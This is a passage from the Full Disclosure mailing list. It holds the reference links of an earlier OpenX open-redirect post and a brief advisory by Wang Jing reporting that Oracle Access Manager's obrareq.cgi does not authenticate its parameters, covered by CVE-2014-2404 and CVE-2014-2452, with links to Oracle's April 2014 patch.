References:
https://github.com/kriwil/OpenX/blob/master/www/index.php
http://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/
http://www.openx.com
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Oracle Access Manager (OAM) Vulnerabilities (CVEs)

[Jing Wang]

Oracle Access Manager (formerly known as Oblix NetPoint and Oracle COREid)
provides a full range of identity administration and security functions,
that include Web single sign-on; user self-service and self-registration;
sophisticated workflow functionality; auditing and access reporting; policy
management; dynamic group management; and delegated administration.


The main file of OAM is "obrareq.cgi". However the file does not
authenticate its parameters properly. So attackers can modify its
parameters as they like and do attacks.




My name is Wang Jing. I am a Mathematics PhD student from Nanyang
technological University, Singapore. I reported the vulnerabilities to
Oracle in February, 2014.

The vulnerabilities fixed by Oracle in the following update:
http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html



More Details:
http://www.tetraph.com/blog/2014/06/oracle-access-manager-oam-vulnerabilities/



CVE Details:
CVE-2014-2404: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2404
CVE-2014-2452: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2452

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/